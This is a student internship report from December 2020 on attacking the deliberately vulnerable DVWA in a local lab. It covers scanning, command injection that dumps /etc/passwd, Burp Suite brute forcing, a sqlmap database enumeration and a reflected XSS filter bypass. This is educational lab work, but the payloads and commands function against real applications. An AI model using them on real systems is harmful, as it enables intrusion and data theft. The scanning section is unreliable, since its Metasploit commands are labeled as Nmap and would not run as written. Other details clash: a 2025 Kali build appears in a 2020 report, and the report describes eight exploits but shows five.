VULNERABILITY DETECTION AND EXPLOITATION OF WEB

APPLICATIONS

Apoorav Verma

[email protected]

A Project
Submitted to: - Tech _Pupil Cybersecurity
Internship

December 4, 2020
VULNERABILITY DETECTION AND EXPLOITATION OF WEB APPLICATIONS

Apoorav Verma
Table of Contents

Abstract .................................................................................................................................................................. 1

Introduction ............................................................................................................................................................ 1

Technical Requirements ....................................................................................................................................... 1-2

Listing vulnerabilities using NMAP ...................................................................................................................... 3-4

DVWA- Command Injection ................................................................................................................................ 5-6

DVWA- Brute Force Exploit using Burp suite ...................................................................................................... 7-9

DVWA- SQL Injection integrating Burp and SqlMap......................................................................................... 10-11

DVWA- Cross site scripted (Reflected)..............................................................................................................12-13

ii
 UNIT– VULNERABILITY DETECTION AND EXPLOITATION OF WEB APPLICATIONS

Abstract
Web Applications are subject to threats as they tend to be vulnerable. This unit will be focusing on various web
application vulnerability detection and attempting to exploit them as well. The main goal will be to identify and utilize
some of the tools to perform penetration testing on existing publicly available vulnerable web applications.

Introduction
A web application is composed of several components which needs a systematic approach to perform the penetration
testing. Hence, various steps that need to be followed to exploit web applications according to the web application
hacker’s methodology [1] will be:

 Information Gathering and Enumeration- The information gathering, and enumeration of the vulnerabilities have
been illustrated with the use of nmap tool on the damn vulnerable web application in the exploit 1 of this unit.
 Input based issues and issues with specific functionality detection- The issues related to input can be command
injection and Brute force attacks have been also well explained in the second and third exploit of the unit.
Meanwhile, SQL injection which is 4th exploit specifically focusses on the attacks on database.
 Logical vulnerability detection- Logical concepts for detecting vulnerabilities have been used in all the exploits
which lets one aware of the exploit implementation possibility and risk related to that.
 Authentication, session management and access control vulnerabilities detection- Authentication bypass and
session hijacking which are 6th and 7th exploit comes under this category.
 Miscellaneous and Information Leakage Tests- The 5th and 8th Cross site scripting recipes and the last unvalidated
redirects and forwards exploit recipe highlights this category of the attacks.
In order to perform the above mentioned procedure to execute penetration testing, the use of publicly available
vulnerable applications will be used as the main goal is to make the future enthusiasts learn about the whole process
to make the information secure and not to make them able to attack the web applications.

Technical Requirements
The following web applications will be used for testing purposes:

 Damn Vulnerable Web Application (DVWA)

This web applications already exist within a vulnerable operating system named Metasploitable 2 and the best system
to perform the penetration testing will be kali linux comprising of the docker. Hence, we need the following two
virtual operating systems that can be opened in the VMware Workstation and the links are given below:

 Kali Linux (Kali-linux-2025.1a-installer-amd64): https://www.offensive-security.com/kali-linux-vm-vmware-

virtualbox-image-download/
The Kali need to be configured with the basic settings and the IP need to be configured as 192.168.146.128
 Metasploitable 2(Metasploitable2-Linux): https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
This operating system needs to be configured with the IP configured as 192.168.146.133

It will be possible to access DVWA from web browser of the kali machine that was configured to perform various
vulnerability detection methods and perform exploits whose recipes will be discussed in the recipes:

1
 Figure 1. DVWA accessible from the kali virtual machine

References

[1] Damn Vulnerable Web Application (DVWA). [2] Offensive Security, “Metasploitable 2,” [Online]. Available

2
1. Listing vulnerabilities using NMAP

As there is a need for the set of vulnerabilities whose recipes need to be discussed, so the first ever recipe with
respect to the web applications is the listing of the vulnerabilities. In order to achieve this, NMAP will be used.
NMAP is a web application vulnerability scanner plugin that exists within the kali linux integrated into Metasploit[2].

 Approach to be used
The following steps suggested [3], need to be followed in the terminal of the kali machine which was configured
earlier to get the desired output of the list of vulnerabilities:
1. NMAP tool needs to be loaded within the metasploit framework.
2. New site needs to be added followed by creating the target.
3. Identify and enumerate the modules applicable with the target site.
4. Execute the identified modules
5. List the vulnerabilities
All the above steps will be applied on the earlier mentioned Damn Vulnerable Web Application.

 Vulnerability scanning technical details

Before the approach is applied, it should be noted that user must be logged in as the root in the terminal and to
login as root, a person can use the following code:
sudo su
After mentioning the credentials for root user, database of msf needs to be initiated to load the required plugin in
msfconsole. This can be achieved by using
msfdb init
As per the approach discussed above, the technical steps to perform the scanning are mentioned below:
To load the plugin into metasploit framework, the following code is to be used.
load nmap
To add a new site and then create the target,
nmap_sites -a 192.168.146.133
nmap_targets -t http:// 192.168.146.133/dvwa/index.php
Enumerate and then execute the applicable modules using
nmap_run -t
nmap_run -e
List the vulnerabilities found using the following command
nmap_vulns -l

 Vulnerabilities findings

The following list of vulnerabilities were identified after the execution of the successful nmap scan performed:

msf5 > nmap_vulns -l

[*] + [192.168.146.133] (192.168.146.133): scraper /
[*] scraper Scraper
[*] GET Metasploitable2 - Linux
[*] + [192.168.146.133] (192.168.146.133): directory
/dav/ [*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory
/doc/ [*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory /cgi-
bin/

3
 [*] directory Directory found.
[*] GET Res code: 403
[*] + [192.168.146.133] (192.168.146.133): directory
/icons/ [*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory
/index/ [*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory
/phpMyAdmin/ [*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): directory
/test/ [*] directory Directory found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): file /index.php
[*] file File found.
[*] GET Res code: 404
[*] + [192.168.146.133] (192.168.146.133): file /dav
[*] file File found.
[*] GET Res code: 404
[*] + [192.168.146.133] (192.168.146.133): file /index
[*] file File found.
[*] GET Res code: 200
[*] + [192.168.146.133] (192.168.146.133): file /phpMyAdmin
[*] file File found.
[*] GET Res code: 301
[*] + [192.168.146.133] (192.168.146.133): file /test
[*] file File found.
[*] GET Res code: 301

 Summary: Hence, this method helps one learn about how nmap can be used to identify set of vulnerabilities
with the mentioned targets in the msfconsole after the msfdb database is initiated.

Once, one becomes familiar with scanning the vulnerabilities of dvwa and mutillidae, then one can move forward to
performing the web-based applications exploits which will be discussed in the coming chapters.

References
Rahalkar, S. (2020). Web Application scanning using NMAP. In Chapter 7: Web Application Scanning with Metasploit,
in Metasploit 5.0 for Beginners: Perform penetration testing to secure your IT environment against threats and
vulnerabilities (2nd ed.). Packt Publishing. Available at: https://learning.oreilly.com/library/view/metasploit-50-
for/9781838982669/B15240_07_Final_ASB_ePub.xhtml

4
2. DVWA- Command Injection

Command injection is a type of input-based exploit in which hacker can mention specific set of commands or codes
in the vulnerable applications where the user input is required. In this chapter, the focus is going to be on learning the
process of checking the source code of the web application which in this case will be DVWA and then placing set of
commands in the input field to retrieve the sensitive information from the application.

 Approach to be used
Damn Vulnerable Web Application comes with the 3 levels of security- low, medium and high. The command
injection exploit will be attempted at all the security levels after going through the source code and figuring the
vulnerability in the code along with the reasoning and the required useful output with the perspective of an attacker.

 Vulnerability scanning technical details

After going through the source code at all the security levels and using the reference [4], the following vulnerable
code was considered to perform the exploits.
Note: Source code can be found at the right bottom of the screen
Low Security:
$cmd = shell_exec( 'ping -c 3 ' . $target ); -- no constraints mentioned if we mention anything

Medium Security:
$substitutions = array( -- constraints only to these set of special characters
'&&' => '', -- means other special characters can be used with code
';' => '',
);

High Security: No such vulnerability was detected in the source code. This can vary with the version of DVWA one
configures in the system.

 Exploit Execution Details

A set of special characters can be utilized in the low security level along with the sensitive code to retrieve
information and these are &, &&, |, || and ; [4]
Looking at the constraints in medium security level &, | and || can still be used with the commands that can retrieve
data.
An attempt to check the kernel version and other system information of the web application will be made using
uname -a
Moreover, an attempt to retrieve the content of passwd file will be made so that sensitive information can be accessed
by using
cat /etc/passwd

 Exploit Execution findings

Upon combining the special characters with the special characters and the commands mentioned above, the following
outputs were generated.
Input: uname -a
Output:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Input: 192.168.146.133| cat /etc/passwd

Output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

5
 sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false

 Summary
Upon varying the security levels, source code played an important role to figure out the vulnerabilities and then the
commands helped in retrieving sensitive file which can even lead to obtain the root access of the system in which web
application is running. Hence, command injection is the basic penetration test that every web application needs to pass
and every enthusiast needs to learn about whether one is a programmer or a tester.

References
[1] “(Damn Vulnerable Web App (DVWA): Lesson 2),” Damn Vulnerable Web App (DVWA):
Lesson 2: Command Execution Basic Testing. [Online]. Available:
https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson2/index.
html.
[2] ap4che, “DVWA tutorial - Exploit Command injection (Low - Medium - High security)” [Online].
Available: https://www.youtube.com/watch?v=ngYKuoJmAL4&list=LLYgqGxFDLtjgN84AexrFybA .

6
3. DVWA- Brute Force Exploit using Burp suite

Brute force attack is the type of attack in which the concept of trial and error is used by the hacker to figure out the
user login credentials or for other purposes [5]. DVWA is subject to the brute force attack which can be done with the
help of a tool named Burp suite which can intercept the requests by integrating with the web browser and further use
payloads to input from the list.

 Approach to be used
DVWA will be set to low security level and burp suite will be integrated with the web browser to use the default proxy
settings and then first intercepting the request after entering random user credentials in the brute force section dvwa
web page. Once the request is intercepted the retrieved Raw information will be sent to the intruder where the cluster
bomb attack type will be chosen in the positions tab and two payloads will be created along with the input list to
perform the brute force attack [6].

 Vulnerability scanning details

After going through the source code of the web page, it was figured out that a portion of code can help in performing
the exploit with the help of the burp suite’s intruder option named Grep – Match which helps in flagging the matched
string retrieved after making certain number of trial and error and the unflagged inputs will be the useful credentials
that can be utilized to obtain the access of the web application. The helpful code is:
else {
// Login failed
sleep(3);
echo "<pre><br>Username and/or password incorrect.</pre>"; -- useful string for Grep - Match
}

 Exploit Execution Details

The following steps need to be followed to perform the above-mentioned exploit:
1. In the connection settings of the web browser the manual http proxy needs to be set to 127.0.0.1 and port to 8080.
Also, this proxy server needs to be set default for all protocols.

Figure 2. Connection settings

2. Randomly enter the credentials in the brute force login page of dvwa and turn on the intercept feature in the proxy
tab of the burp suite and once the request is intercepted move it to the intruder by right clicking and choosing the
option for it as shown below:

7
 Figure 3. Send to intruder

3. Then choose the attack type to cluster bomb in the intruder’s positions tab and adding to payloads by selecting
values of username and password as shown:

Figure 4. Choosing attack type and adding 2 payloads to perform brute force

4. In the payloads tab add the payload options for both the payload sets and one can choose from the keywords list
and importing them from local system. However, for practical purposes only 2 payload options were added to
differentiate. Finally, before initiating the string is added in options tab to Grep – Match and flag option was
selected.

 Exploit Execution Findings

With the implementation procedure discussed above the following output was obtained:

Figure 5. Brute force attack results

As for the username admin and password as password the flag is not ticked, it can be noted that the string length is
different, and one will be able to login into the web page as admin.

8
 Summary
This attack introduce enthusiasts to the tool named burp suite which can be utilized to perform web application exploits
and this attack helps one understand how important it is to hide the source code else it can be used by hackers to
perform the brute force attack like it was done.

 References
[3] Kaspersky, “Brute Force Attack: Definition and Examples,” www.kaspersky.com, 20-Oct-2019.
[Online]. Available: https://www.kaspersky.com/resource-center/definitions/brute-force-attack.
[4] admiralgaust, “Brute Forcing with Burp Suite (DVWA)”, 14-Aug-2018. [Online].
Available: https://www.youtube.com/watch?v=jzlv0n13ln0.

9
4. DVWA- SQL Injection integrating Burp and SqlMap

SQL Injection is a technique used by attackers to fetch the database related information by inserting sql query in
the input field [7]. There are various set of queries that can be utilized to retrieve the system data but somehow,
in this case burp suite will be used to intercept the simple query and its output will be used in the terminal by
using the sqlmap to fetch the database information as much as possible.

 Approach to be used
DVWA will be subject to this enumeration exploit and the same steps as used in the previous exploit need to be
applied to integrate web browser with Burp suite by setting the manual proxy. The difficulty level will be set to
medium and check if it is possible to retrieve information or not. Further, following the instructions by [8], the
input will be intercepted and relvant information fetched in the raw data will be used to gather further details
using sqlmap command in the terminal.

 Vulnerability Scanning Details

No such information was relevant within the source code of the page as there were no exceptions applied to the
input being retrieved if attacker is able to use the ‘or’ and ‘and’ to retrieve multiple data.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; -- can be modified
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); -- no exception

 Exploit Execution Details

The following steps need to be followed in order to perform the exploit:
1. The same first step of Exploit 3 needs to be followed to set the manual proxy to integrate browser with the burp
suite.

Figure 6. Connection Settings

2. One can simply input 1 in the input field to fetch data about the user id 1 and here is the output that will be
generated:

Figure 7. Simple entry into the field

3. The main aim is to intercept this input and retrieve raw data as below out of which important information fetched
has been highlighted:

10
 GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.146.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://192.168.146.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
Connection: close
Cookie: security=medium; PHPSESSID=135fbad9b4a3a31fbcecfc0951af99cf
Upgrade-Insecure-Requests: 1
4. This information will be passed as arguments in the sqlmap command in the terminal and the complete command
will be:
sqlmap -u “http://192.168.146.133/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” “—
cookie=security=medium; PHPSESSID=135fbad9b4a3a31fbcecfc0951af99cf” –dbs

 Exploit Execution Findings

The output of the above command was very big and the relevant output is mentioned below:

[22:05:29] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 4.1
[22:05:29] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

 Summary
This exploit helps in identifying the back-end DataBase Management System which is MySQL and available
databases are also fetched that can be attacked upon if exploited in depth. Hence, this exploit helps to retrieve
database information after performing SQL Injection integrating the usage of Burp and SQLMap.

 References
[5] “(Damn Vulnerable Web App (DVWA): Lesson 6),” Damn Vulnerable Web App (DVWA): Lesson 6:
Manual SQL Injection, John the Ripper. [Online]. Available:
https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/index.html.
[6] Sai, “Burpsuite - 1 (SQL injection,intercepting),” Hacking Monks, 01-Jan-1970. [Online]. Available:
http://www.hackingmonks.net/2017/01/burpsuite-1-sql-injectionintercepting.html.

11
5. DVWA- Cross site scripted (Reflected)

A reflected cross site scripted attack is a type of attack in which the hacker inputs the data in the form of http
requests to reflect the output in the way one wishes it to be [9]. In such a case, attacker capable to get the access
of the legit user’s browser, then all the things that user is capable of the attacker will also become capable of. This
attack can be tested at all the three levels: low, medium and high in the DVWA which will be a part of process in
this exploit.

 Approach to be used
The http tags will be used as input to reflect the outputs after going through the source code in all 3 security modes
in DVWA application.

 Vulnerability Scanning Details

Upon analyzing the source code of xss(reflected) page the following findings were made regarding the
vulnerabilities in the different security level.

Medium mode:
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); -- restrictions only on <script> tag

 Exploit Execution Details

The following scripts needs to be executed at the three different levels to retrieve the information following the
guidelines [10],[11] and learn about the execution of the basics of this exploit.

Medium mode:
As the script tag is restricted in low caps, high caps can still be implemented
<SCRIPT>alert(“Hello h e l l o medium mode allows script tag to work in caps for xss
reflected”)</SCRIPT>

 Exploit Execution findings

The following outputs were generated as per the application of the tags discussed above.

Medium mode:

Figure 9. Medium mode xss reflected

 Summary
This exploit helps in identifying the vulnerabilities in the source code that can further lead to exploit which make
web application pen testers learn about the concept of reflected cross site scripting.

 References
[7] “What is reflected XSS (cross-site scripting)? Tutorial &amp; Examples: Web Security Academy,”.

12
[Online]. Available: https://portswigger.net/web-security/cross-site-scripting/reflected.
[8] Bubbah Smith, “DVWA - XSS reflected low, medium and high security”. [Online]. Available:
https://www.youtube.com/watch?v=Uvq1IP2I-mQ.
[9] M. S. da Veiga, “DVWA 1.9+: XSS Reflected,” Medium, 04-Oct-2019. [Online]. Available:
https://medium.com/hacker-toolbelt/dvwa-1-9-xss-reflected-58047a2d0ac1.

13